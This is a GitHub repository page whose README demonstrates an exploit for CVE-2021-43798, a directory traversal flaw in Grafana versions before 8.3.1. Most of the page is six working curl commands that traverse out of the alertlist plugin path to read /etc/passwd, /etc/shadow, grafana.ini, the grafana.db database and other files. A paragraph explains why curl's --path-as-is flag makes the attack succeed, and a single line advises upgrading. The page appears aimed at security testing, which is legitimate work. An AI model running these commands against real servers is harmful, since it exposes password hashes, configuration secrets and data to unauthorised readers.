Skip to content

MalekAlthubiany/CVE-2021-43798

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
README.md
README.md
 
 

Repository files navigation

Grafana CVE-2021-43798 Exploit

Overview

This repository demonstrates the exploitation of CVE-2021-43798, a directory traversal vulnerability in Grafana. This vulnerability allows attackers to read arbitrary files on the server.

CVE Details

  • CVE: CVE-2021-43798
  • Description: Directory traversal vulnerability in Grafana versions prior to 8.3.1.
  • Impact: Allows unauthenticated attackers to read arbitrary files on the server.

Prerequisites

  • A vulnerable version of Grafana running (before 8.3.1)
  • Access to the target Grafana instance

Exploitation

Using curl

To exploit the vulnerability manually, you can use one of the following curl commands to attempt to read sensitive files:

curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

Why --path-as-is?

In the context of exploiting the Grafana CVE-2021-43798 directory traversal vulnerability, the --path-as-is option is essential because it allows the specially crafted traversal sequences (../../../../../) to be sent directly to the server without modification. This can lead to accessing sensitive files on the server that are outside the intended directory.

Without --path-as-is, curl might normalize the path to something like /public/plugins/Users/install.txt, which would not exploit the vulnerability. By using --path-as-is, the exact traversal sequence is preserved, allowing the exploit to succeed.

Documentation Reference

You can find more details about the --path-as-is option in the curl documentation. By understanding and utilizing --path-as-is, security professionals and researchers can effectively demonstrate and test for directory traversal vulnerabilities in web applications.

Mitigation

To mitigate this vulnerability, upgrade Grafana to version 8.3.1 or later.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published